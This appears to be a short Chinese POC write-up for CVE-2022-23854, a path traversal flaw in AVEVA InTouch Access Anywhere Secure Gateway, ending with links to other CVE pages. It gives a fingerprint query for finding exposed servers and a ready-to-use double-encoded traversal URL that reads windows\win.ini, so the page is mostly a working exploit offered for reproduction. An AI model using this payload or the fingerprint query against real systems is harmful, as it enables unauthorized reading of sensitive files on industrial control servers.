# AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854

# 漏洞描述

AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞，未授权的攻击者可利用该漏洞获取服务器敏感信息。

# 漏洞影响

AVEVA InTouch安全网关

# 网络测绘

body="InTouch Access Anywhere"

# 漏洞复现

登录页面

验证POC

/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini

Joomla application 未授权访问漏洞 CVE-2023-23752 Harbor 未授权创建管理员漏洞 CVE-2019-16097